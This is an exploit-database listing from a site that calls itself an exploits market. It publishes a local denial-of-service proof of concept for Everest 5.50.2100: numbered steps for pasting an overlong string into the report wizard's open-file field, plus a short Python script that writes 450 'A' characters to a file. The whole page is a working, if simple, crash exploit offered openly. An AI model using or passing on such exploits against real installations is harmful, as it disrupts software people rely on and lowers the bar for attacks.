[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Everest 5.50.2100 - (Open File) Denial of Service Exploit

Author
Ivan Marmolejo
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-34156
Category
dos / poc
Date add
28-03-2020
Platform
windows
# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Software Link : http://www.lavalys.com/
# Tested Version: 5.50.2100
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Home Single Language

# Steps to produce the crash:
#1.- Run python code: Everest.py
#2.- Open Everest.txt and copy content to clipboard
#3.- Open "Everest Ultimate Edition"
#4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo"
#5.- In "Abrir Archivo" field paste Clipboard
#6.- Select "Next"
#7.- Crashed

buffer = "\x41" * 450
f = open ("Everest.txt", "w")
f.write(buffer)
f.close()


#  0day.today [2024-07-05]  #